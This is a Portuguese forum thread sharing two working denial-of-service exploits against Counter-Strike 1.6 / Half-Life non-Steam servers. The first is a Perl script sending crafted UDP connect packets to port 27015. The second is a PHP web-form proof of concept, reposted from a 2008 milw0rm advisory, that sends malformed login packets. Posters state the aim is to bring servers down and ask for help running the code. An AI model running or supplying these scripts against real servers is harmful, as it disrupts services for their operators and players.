Counter Strike 1.6 - DoS

[Joey]

Linguagem do exploit: Perl
Função: Derrubar servidores de Counter-Strike 1.6

Código Selecionar Expandir

#!/usr/bin/perl
# Server must not be running steam. /str0ke


# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015' ,Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

[lostph]

sh4gr4th, não consegui usa seu exploit

uso o Active Perl, salvei na pasta bin counterstrike.pl

executei no ms-dos e naum deu nd ...

apenas umas msg assim

usage: ./csdos at c:\Perl\Bin\counterstrike.pl line 9.

abraços

[d1ngell]

sh4gr4th, não consegui usa seu exploit

uso o Active Perl, salvei na pasta bin counterstrike.pl

executei no ms-dos e naum deu nd ...

apenas umas msg assim

usage: ./csdos at c:\Perl\Bin\counterstrike.pl line 9.

abraços

Mesma coisa aqui :/

[Ilmo. Sr. JulianoRossi]

Usem ente:

Código Selecionar Expandir

----[  Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ]

Counter Strike 1.6 Denial Of Service POC
Eugene Minaev underwater@itdefence.ru
Bug was found by Maxim Suhanov ( THE FUF )
works only with no-steam servers
___________________________________________________________________
____/  __ __ _______________________ _______  _______________    \  \   \
/ .\  /  /_// //              /        \       \/      __       \   /__/   /
/ /     /_//              /\        /       /      /         /     /___/
\/        /              / /       /       /\     /         /         /
/        /               \/       /       / /    /         /__       //\
\       /    ____________/       /        \/    __________// /__    // /   
/\\      \_______/        \________________/____/  2007    /_//_/   // //\
\ \\                                                               // // /
.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / .
. \_\\________[________________________________________]_________//_//_/ . .

<html>
<head>
<title>Counter Strike DOS POC (underwater@itdefence.ru) </title>

<style type="text/css">

input {
width: 150px;
}

td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}

span.err {
color: red;
}

span.ok {
color: green;
}

</style>

</head>

<body onload="checkpass()">

<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">

<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>

<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>

<tr>
<td> </td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>

<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>


<tr>
<td> </td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>


</table>
<br/>
</form>
</div>
<center>ITDEFENCE / RUSSIA (http://itdefence.ru)<br>
</body>
</html>

<?php

/*
CS-dos exploit made by underwater 
Bug was discovered by &#46;FUF  
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server [IMG&#93;http&#58;//www&#46;softoplanet&#46;ru/style_emoticons/default/biggrin&#46;gif[/IMG&#93; ) , SkvoznoY , Bug(O)R,Antichat&#46;ru and Cup&#46;su
*/

ini_set("display_errors","0");

function HELLO_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet &#46;= "TSource Engine Query";
$packet &#46;= pack("H*","00");
return $packet;
}

function CHALLENGE_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet &#46;= "getchallenge valve";
$packet &#46;= pack("H*","00");
return $packet;
}

function LOGIN_PACKET_4()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet &#46;= "connect 47 ";
$packet &#46;= $cookie&#46;' "';
$packet &#46;= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet &#46;= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet &#46;= 'el\gordon\name\Born to be pig (&#46;&#46;)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet &#46;= 'word\\'&#46;$password;
$packet &#46;= pack("H*","220A0000EE02");
return $packet;
}

function LOGIN_PACKET_2()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet &#46;= "connect 47 ";
$packet &#46;= $cookie&#46;' "';
$packet &#46;= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet &#46;= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
$packet &#46;= 'e\Born to be pig (&#46;&#46;)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet &#46;= 'word\\'&#46;$password;
$packet &#46;= pack("H*","22");
return $packet;
}

function dowork($host,$port,$password,$auth)
{
global $password;
global $cookie;
# connecting to target host
$fsock = fsockopen("udp&#58;//"&#46;$host,(int) $port,$errnum,$errstr,2);
if (!$fsock) die ($errstr);
else 
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp = fread($fsock,100);
# grab cookies from packet
$cookie = substr($resp,strpos($resp,"A00000000")+10);
$cookie = substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
$resp = fread($fsock,100);
}
}

IF (isset($_POST['host'&#93;) && isset($_POST['port'&#93;))
{
IF (empty($_POST['pass'&#93;)) $password = "123";
else $password = $_POST['pass'&#93;;
$fserver = $_POST['host'&#93;;
$fport = $_POST['port'&#93;;
if (isset($_POST['auth'&#93;)) $fauth = true;else $fauth=false;
# we have to connect 2 times
$result = dowork($fserver,$fport,$password,$fauth);
$result = dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]